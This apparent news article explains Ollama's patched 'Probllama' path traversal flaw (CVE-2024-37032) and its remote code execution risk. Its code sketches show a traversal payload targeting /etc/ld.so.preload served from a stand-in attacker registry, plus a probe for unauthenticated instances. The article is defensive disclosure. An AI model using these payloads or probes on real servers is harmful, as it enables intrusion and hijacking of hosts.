Recent research has uncovered a now-patched security flaw in Ollama, an open-source artificial intelligence (AI) infrastructure platform. Based on reports, threat actors could exploit the vulnerability to achieve remote code execution.
The researchers dubbed the CVE-2024-37032 bug “Probllama” and disclosed it last month, shortly after discovering it. The Ollama maintainers have already resolved the issue in version 0.1.34, released on May 7, 2024.
The impacted AI platform is a service that allows a user to package, deploy, and run large language models (LLMs) locally on multiple operating systems, including Windows, Linux, and macOS.
The Ollama bug is an insecure input validation issue.
According to investigations, the recently discovered critical Ollama vulnerability is a case of insufficient input validation. It results in a path traversal flaw that an unauthorised individual can use to overwrite arbitrary files on the server, which could in turn lead to remote code execution.
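The class of bug described above can be illustrated with a minimal sketch. The function and directory names below are hypothetical and do not come from Ollama's actual codebase; the point is only to show how an unvalidated, attacker-supplied name joined onto a storage directory can escape it, and what a containment check looks like:

```python
import os

def unsafe_target(base_dir, supplied_name):
    # BUG: the supplied name is joined without validation, so a
    # "../" payload walks out of the intended directory.
    return os.path.normpath(os.path.join(base_dir, supplied_name))

def safe_target(base_dir, supplied_name):
    # FIX: resolve the final path and require it to stay inside base_dir.
    candidate = os.path.normpath(os.path.join(base_dir, supplied_name))
    if not candidate.startswith(os.path.abspath(base_dir) + os.sep):
        raise ValueError("path traversal attempt rejected")
    return candidate

# A traversal payload escapes the (illustrative) model storage directory:
print(unsafe_target("/var/lib/models", "../../../etc/ld.so.preload"))
# -> /etc/ld.so.preload
```

The guarded variant raises an error for the same payload while still accepting legitimate relative names such as `llama/manifest.json`.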
To exploit the vulnerability successfully, a threat actor must send specially crafted HTTP requests to the Ollama API server.
The attack specifically abuses the “/api/pull” API endpoint, which is used to download a model from the official registry or a private repository, to deliver a malicious model manifest file containing a path traversal payload.
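A rough sketch of the attack shape, not a working exploit: the registry host, model name, and manifest contents below are hypothetical. The `/api/pull` endpoint does accept a model name that may point at a private registry, and the idea is that a rogue registry returns a manifest in which a traversal payload sits where a content digest is expected:

```python
import json

def build_pull_request(model_ref):
    # Shape of the request a client sends to its own Ollama server;
    # the model reference steers the server to an attacker's registry.
    return {
        "method": "POST",
        "path": "/api/pull",
        "body": json.dumps({"name": model_ref}),
    }

req = build_pull_request("attacker-registry.example/library/evil-model")

# Hypothetical manifest the rogue registry could serve: a path
# traversal payload occupies the field that should hold a digest.
malicious_manifest = {
    "layers": [
        {
            "mediaType": "application/vnd.ollama.image.model",
            "digest": "../../../../etc/ld.so.preload",  # not a sha256: digest
        }
    ]
}
```

If the server uses that field to build a filesystem path without validation, the downloaded content lands outside the model store.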
Additionally, the flaw could be exploited to corrupt arbitrary files on the system and achieve remote code execution: by overwriting a configuration file associated with the dynamic linker so that it points to a rogue shared library, an attacker ensures the library is loaded every time a program is executed.
Ollama’s lack of built-in authentication further complicates the situation, since it allows an attacker with access to a publicly exposed server to steal or tamper with AI models and compromise self-hosted AI inference servers.
The researchers therefore recommend shielding such deployments behind middleware, such as reverse proxies with authentication enabled. They claimed they discovered over 1,000 internet-exposed Ollama instances hosting numerous AI models without any protection.
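The kind of exposure the researchers' scan implies can be sketched as follows. Ollama's default port is 11434, and /api/tags is the endpoint that lists locally hosted models; a server that answers it without credentials is revealing its model inventory to anyone who can reach the port. The host used here is a placeholder:

```python
import json
from urllib.request import urlopen
from urllib.error import URLError

def is_unauthenticated(host, port=11434, timeout=3):
    # Probe the model-listing endpoint; a valid JSON reply with no
    # credentials supplied means nothing is gating access.
    try:
        with urlopen(f"http://{host}:{port}/api/tags", timeout=timeout) as resp:
            json.load(resp)
            return True
    except (URLError, ValueError, OSError):
        # Unreachable, or an authenticating proxy is in the way.
        return False
```

Placing an authentication-enabled reverse proxy in front of the service makes this probe fail, which is exactly the middleware mitigation the researchers suggest.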
They also explained that Probllama is an easy-to-exploit RCE flaw affecting modern AI infrastructure. Even though the codebase is relatively new and written in modern programming languages, classic vulnerabilities such as path traversal remain an issue.
Users of the platform should update their software promptly, since details of the bug are now publicly available, giving malicious entities a blueprint for mounting an attack.